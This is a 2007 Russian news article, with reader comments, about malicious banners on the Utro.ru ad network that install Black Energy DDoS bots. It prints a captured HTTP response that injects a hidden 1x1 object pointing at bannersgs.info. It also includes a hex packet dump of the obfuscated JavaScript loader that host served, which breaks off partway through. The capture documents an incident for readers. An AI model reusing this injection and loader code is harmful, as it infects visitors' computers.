Баннерная сеть Utro.ru заражает посетителей

image

Теги: DDoS, ботнет, бот, код

В четверг в баннерной сети издания Utro.ru появился вредоносный код. После заражения на компьютере пользователя устанавливаются боты, которые принимают участие в DDoS-атаках

В четверг в баннерной сети издания Utro.ru появился вредоносный код. После заражения на компьютере пользователя устанавливаются боты, которые принимают участие в DDoS-атаках, сообщает блог по безопасности urs-molotoff.

Специалисты предупредили РБК, но вредоносный баннер до сих пор крутится в сетке Utro.ru и заражает компьютеры ботами - а те, в свою очередь, заваливают "заказанные" сайты. Называется этот ботнет Black Energy,  и его автор, по некоторым сведениям - наш соотечественник.

Западные эксперты отмечают, что в последнее время ботнеты все чаще приходят из России. В конце ноября ФБР рапортовало о завешении второй части операции Bot Roast по борьбе с ботнетами у себя в США. В то же время в Рунете как раз в ноябре стали ходить рассылки с рекламой услуг про организации DDoS-атак с помощью ботнетов. А теперь дошло и до баннерной сети Utro.ru в качестве рекламной площадки.

Стоит отметить также, что это уже третий в этом году случай распространения вредоносных кодов через проекты РБК. В июле благодаря предыдущему заражению баннерной сети Utro.ru несколько известных новостных сайтов стали распространителями трояна, который занимался кражей идентификационных данных пользователей Quik. Ранее в июне трояны для кражи паролей распространялись через главный сайт РБК.

Подробности:

GET /cgi-bin/banner/utro?82779&options=FN' HTTP/1.1 
   Host: www.txt.utro.ru 
   User-Agent: Mozilla/5.0 (X11; U; Linux i686; ru; rv:1.8.1.11) Gecko/20071204 Ubuntu/7.10 (gutsy) Firefox/2.0.0.11 
   Accept: */* 
   Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3 
   Accept-Encoding: gzip,deflate 
   Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7 
   Keep-Alive: 300 
   Connection: keep-alive 
   Referer: http://www.utro.ru/includes5/banners/advert_part.html 
   Cookie: __utma=143070705.897126579.1189666299.1196144486.1196938604.33; 
   __utmz=143070705.1194419286.21.3.utmccn=(referral)|utmcsr=ytro.ru|utmcct=/|utmcmd=referral; uid=1463242514; __utmb=143070705; __utmc=143070705 
 HTTP/1.1 200 OK 
  Date: Thu, 06 Dec 2007 11:24:48 GMT 
   Server: Apache/1.3.33 (Unix) 
   Content-Length: 648 
   Connection: close 
   Content-Type: application/x-javascript 
  document.close(); 
  parent.document.getElementById('utxt82779').parentNode.innerHTML="5 баллов: Московский школьник признался в убийстве 37 человек\r\n 
   <object data=\"http://bannersgs.info/stat/index.php\" width=\"1\" height=\"1\" style=\"1\"></object>\r\n"; 

   45 00 01 47 47 98 40 00 76 06 1d 79 0a 40 5e 63 E..GG.@.v..y.@^c 
   42 24 f3 d8 09 8f 00 50 7f a6 84 fd df a4 aa 51 B$.....P.......Q 
   50 18 fa f0 63 de 00 00 47 45 54 20 2f 73 74 61 P...c...GET /sta 
   74 2f 69 6e 64 65 78 2e 70 68 70 20 48 54 54 50 t/index.php HTTP 
   2f 31 2e 31 0d 0a 41 63 63 65 70 74 3a 20 2a 2f /1.1..Accept: */ 
   2a 0d 0a 52 65 66 65 72 65 72 3a 20 68 74 74 70 *..Referer: http 
   3a 2f 2f 77 77 77 2e 35 62 61 6c 6c 6f 76 2e 72 ://www.5ballov.r 
   75 2f 65 78 74 65 72 6e 61 6c 2f 62 61 6e 6e 65 u/external/banne 
   72 73 2e 70 68 70 3f 66 69 6c 65 3d 62 6c 6f 63 rs.php?file=bloc 
   6b 73 2f 6e 65 77 73 5f 75 74 72 6f 2e 74 70 6c ks/news_utro.tpl 
   0d 0a 41 63 63 65 70 74 2d 4c 61 6e 67 75 61 67 ..Accept-Languag 
   65 3a 20 72 75 0d 0a 41 63 63 65 70 74 2d 45 6e e: ru..Accept-En 
   63 6f 64 69 6e 67 3a 20 67 7a 69 70 2c 20 64 65 coding: gzip, de 
   66 6c 61 74 65 0d 0a 55 73 65 72 2d 41 67 65 6e flate..User-Agen 
   74 3a 20 4d 6f 7a 69 6c 6c 61 2f 34 2e 30 20 28 t: Mozilla/4.0 ( 
   63 6f 6d 70 61 74 69 62 6c 65 3b 20 4d 53 49 45 compatible; MSIE 
   20 36 2e 30 3b 20 57 69 6e 64 6f 77 73 20 4e 54 6.0; Windows NT 
   20 35 2e 31 29 0d 0a 48 6f 73 74 3a 20 62 61 6e 5.1)..Host: ban 
   6e 65 72 73 67 73 2e 69 6e 66 6f 0d 0a 43 6f 6e nersgs.info..Con 
   6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c nection: Keep-Al 
   69 76 65 0d 0a 0d 0a ive....  
   45 00 05 dc 0f 41 40 00 34 06 93 3b 42 24 f3 d8 E....A@.4..;B$.. 
   0a 40 5e 63 00 50 09 8f df a4 aa 51 7f a6 86 1c .@^c.P.....Q.... 
   50 10 19 20 f5 b4 00 00 48 54 54 50 2f 31 2e 31 P.. ....HTTP/1.1 
   20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 54 200 OK..Date: T 
   68 75 2c 20 30 36 20 44 65 63 20 32 30 30 37 20 hu, 06 Dec 2007 
   32 32 3a 34 33 3a 33 31 20 47 4d 54 0d 0a 53 65 22:43:31 GMT..Se 
   72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 32 rver: Apache/2.2 
   2e 36 20 28 46 65 64 6f 72 61 29 0d 0a 58 2d 50 .6 (Fedora)..X-P 
   6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 35 owered-By: PHP/5 
   2e 31 2e 36 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 .1.6..Content-Le 
   6e 67 74 68 3a 20 34 33 38 38 0d 0a 43 6f 6e 6e ngth: 4388..Conn 
   65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 ection: close..C 
   6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 ontent-Type: tex 
   74 2f 68 74 6d 6c 0d 0a 0d 0a 20 20 20 20 20 20 t/html.... 
   20 20 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 <script>functi 
   6f 6e 20 76 34 37 35 38 37 62 31 33 62 39 30 34 on v47587b13b904 
   66 28 76 34 37 35 38 37 62 31 33 62 39 34 33 35 f(v47587b13b9435 
   29 7b 20 76 61 72 20 76 34 37 35 38 37 62 31 33 ){ var v47587b13 
   62 39 38 31 63 3d 31 36 3b 20 72 65 74 75 72 6e b981c=16; return 
   28 70 61 72 73 65 49 6e 74 28 76 34 37 35 38 37 (parseInt(v47587 
   62 31 33 62 39 34 33 35 2c 76 34 37 35 38 37 62 b13b9435,v47587b 
   31 33 62 39 38 31 63 29 29 3b 7d 66 75 6e 63 74 13b981c));}funct 
   69 6f 6e 20 76 34 37 35 38 37 62 31 33 62 39 66 ion v47587b13b9f 
   65 63 28 76 34 37 35 38 37 62 31 33 62 61 33 64 ec(v47587b13ba3d 
   33 29 7b 20 20 76 61 72 20 76 34 37 35 38 37 62 3){ var v47587b 
   31 33 62 61 37 62 63 3d 27 27 3b 66 6f 72 28 76 13ba7bc='';for(v 
   34 37 35 38 37 62 31 33 62 61 62 61 32 3d 30 3b 47587b13baba2=0; 
   20 76 34 37 35 38 37 62 31 33 62 61 62 61 32 3c v47587b13baba2< 
   76 34 37 35 38 37 62 31 33 62 61 33 64 33 2e 6c v47587b13ba3d3.l 
   65 6e 67 74 68 3b 20 76 34 37 35 38 37 62 31 33 ength; v47587b13 
   62 61 62 61 32 2b 3d 32 29 7b 20 76 34 37 35 38 baba2+=2){ v4758 
   37 62 31 33 62 61 37 62 63 2b 3d 28 53 74 72 69 7b13ba7bc+=(Stri 
   6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 ng.fromCharCode( 
   76 34 37 35 38 37 62 31 33 62 39 30 34 66 28 76 v47587b13b904f(v 
   34 37 35 38 37 62 31 33 62 61 33 64 33 2e 73 75 47587b13ba3d3.su 
   62 73 74 72 28 76 34 37 35 38 37 62 31 33 62 61 bstr(v47587b13ba 
   62 61 32 2c 20 32 29 29 29 29 3b 7d 72 65 74 75 ba2, 2))));}retu 
   72 6e 20 76 34 37 35 38 37 62 31 33 62 61 37 62 rn v47587b13ba7b 
   63 3b 7d 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 c;} document.wri 
   74 65 28 76 34 37 35 38 37 62 31 33 62 39 66 65 te(v47587b13b9fe 
   63 28 27 30 44 30 41 30 44 30 41 33 43 37 33 36 c('0D0A0D0A3C736 
   33 37 32 36 39 37 30 37 34 32 30 36 43 36 31 36 372697074206C616 
   45 36 37 37 35 36 31 36 37 36 35 33 44 32 32 36 E67756167653D226 
   41 36 31 37 36 36 31 37 33 36 33 37 32 36 39 37 A617661736372697 
   30 37 34 32 32 33 45 30 44 30 41 36 36 37 35 36 074223E0D0A66756 
   45 36 33 37 34 36 39 36 46 36 45 32 30 34 33 37 E6374696F6E20437 
   32 34 46 32 38 36 46 32 43 32 30 36 45 32 39 32 24F286F2C206E292 
   30 37 42 30 44 30 41 37 36 36 31 37 32 32 30 37 07B0D0A766172207 
   39 32 30 33 44 32 30 36 45 37 35 36 43 36 43 33 9203D206E756C6C3 
   42 30 44 30 41 37 34 37 32 37 39 32 30 37 42 32 B0D0A747279207B2 
   30 36 35 37 36 36 31 36 43 32 38 32 32 37 39 32 06576616C2822792 
   30 33 44 32 30 36 46 32 45 34 33 37 32 36 35 36 03D206F2E4372656 
   31 37 34 36 35 34 46 36 32 36 41 36 35 36 33 37 174654F626A65637 
   34 32 38 36 45 32 39 32 32 32 39 32 30 37 44 36 4286E292229207D6 
   33 36 31 37 34 36 33 36 38 32 38 36 35 32 39 37 3617463682865297 
   42 37 44 30 44 30 41 36 39 36 36 32 30 32 38 32 B7D0D0A696620282 
   31 32 30 37 39 32 39 32 30 37 42 37 34 37 32 37 1207929207B74727 
   39 32 30 37 42 32 30 36 35 37 36 36 31 36 43 32 9207B206576616C2 
   38 32 32 37 39 32 30 33 44 32 30 36 46 32 45 34 82279203D206F2E4 
   33 37 32 36 35 36 31 37 34 36 35 34 46 36 32 36 372656174654F626 
   41 36 35 36 33 37 34 32 38 36 45 32 43 32 30 35 A656374286E2C205 
   43 32 32 35 43 32 32 32 39 32 32 32 39 32 30 37 C225C22292229207 
   44 36 33 36 31 37 34 36 33 36 38 32 38 36 35 32 D636174636828652 
   39 37 42 37 44 37 44 30 44 30 41 36 39 36 36 32 97B7D7D0D0A69662 
   30 32 38 32 31 32 30 37 39 32 39 32 30 37 42 37 02821207929207B7 
   34 37 32 37 39 32 30 37 42 32 30 36 35 37 36 36 47279207B2065766 
   31 36 43 32 38 32 32 37 39 32 30 33 44 32 30 36 16C282279203D206 
   46 32 45 34 33 37 32 36 35 36 31 37 34 36 35 34 F2E4372656174654 
   46 36 32 36 41 36 35 36 33 37 34 32 38 36 45 32 F626A656374286E2 
   43 32 30 35 43 32 32 35 43 32 32 32 43 32 30 35 C205C225C222C205 
   43 32 32 35 43 32 32 32 39 32 32 32 39 32 30 37 C225C22292229207 
   44 36 33 36 31 37 34 36 33 36 38 32 38 36 35 32 D636174636828652 
   39 37 42 37 44 37 44 30 44 30 41 36 39 36 36 32 97B7D7D0D0A69662 
   30 32 38 32 31 32 30 37 39 32 39 32 30 37 42 37 02821207929207B7 
   34 37 32 37 39 32 30 37 42 32 30 36 35 37 36 36 47279207B2065766 
   31 36 43 32 38 32 32 37 39 32 30 33 44 32 30 36 16C282279203D206 
   46 32 45 34 37 36 35 37 34 34 46 36 32 36 41 36 F2E4765744F626A6 
   35 36 33 37 34 32 38 35 43 32 32 35 43 32 32 32 56374285C225C222 
   43 32 30 36 45 32 39 32 32 32 39 32 30 37 44 36 C206E292229207D6 
   33 36 31 37 34 36 33 36 38 32 38 36 35 32 39 37 3617463682865297 
   42 37 44 37 44 30 44 30 41 36 39 36 36 32 30 32 B7D7D0D0A6966202 
   38 32 31 32 30 37 39 32 39 32 30 37 42 37 34 37 821207929207B747 
   32 37 39 32 30 37 42 32 30 36 35 37 36 36 31 36 279207B206576616 
   43 32 38 32 32 37 39 32 30 33 44 32 30 36 46 32 C282279203D206F2 
   45 34 37 36 35 37 34 34 46 36 32 36 41 36 35 36 E4765744F626A656 
   33 37 34 32 38 36 45 32 43 32 30 35 43 32 32 35 374286E2C205C225 
   43 32 32 32 39 32 32 32 39 32 30 37 44 36 33 36 C22292229207D636 
   31 37 34 36 33 36 38 32 38 36 35 32 39 37 42 37 17463682865297B7 
   44 37 44 30 44 30 41 36 39 36 36 32 30 32 38 32 D7D0D0A696620282 
   31 32 30 37 39 32 39 32 30 37 42 37 34 37 32 37 1207929207B74727 
   39 32 30 37 42 32 30 36 35 37 36 36 31 36 43 32 9207B206576616C2 
   38 32 32 37 39 32 30 33 44 32 30 36 46 32 45 34 82279203D206F2E4 
   37 36 35 37 34 34 46 36 32 36 41 36 35 36 33 37 765744F626A65637 
   34 32 38 36 45 32 39 32 32 32 39 32 4286E2922292

или введите имя

CAPTCHA
Страницы: 1  2  
Что-то я не понял: каким образом зловредный код подгружается? В http-ответе не вижу ничего нехорошего... К чему он привидён? Или я просто невнимателен?
0 |
1
10-12-2007 03:03:41
В http ответе есть "нехожошая" function v47587b13b904, которая направит тебя через N редиректов на заливку трояна
0 |
1
10-12-2007 04:07:18
Хм, уже дампы показывают
0 |
1
10-12-2007 15:26:08
Наконец-то дампы показывают!
0 |
1
10-12-2007 04:40:43
Не знал о существовании utro.ru. И не узнаю, ибо она уже в AdBlock )
0 |
1
10-12-2007 10:18:47
Аналогично. А даже если бы ещё не добавил, всё равно все эти троянцы и червяки только для "подоконников", а мне, как "пингвиноводу" они не страшны.
0 |
1
10-12-2007 11:23:01
+1 firefox кул
0 |
1
10-12-2007 09:21:30
Серваки на Лине, поэтому и уязвимости очевидны. Ведать не так хорошо чистят зубы американцы, как хотелось бы.
0 |
10-12-2007 10:18:26
Бздим-с?
0 |
1
10-12-2007 11:55:05
Наверно просто не все на никсах Затесался у них в обменной сети один оригинал-мастдай и тут же подцепил инфекцию.
0 |
я
10-12-2007 10:13:51
какие интересные подробности. ещё б колобка сюда скопипастили
0 |
Страницы: 1  2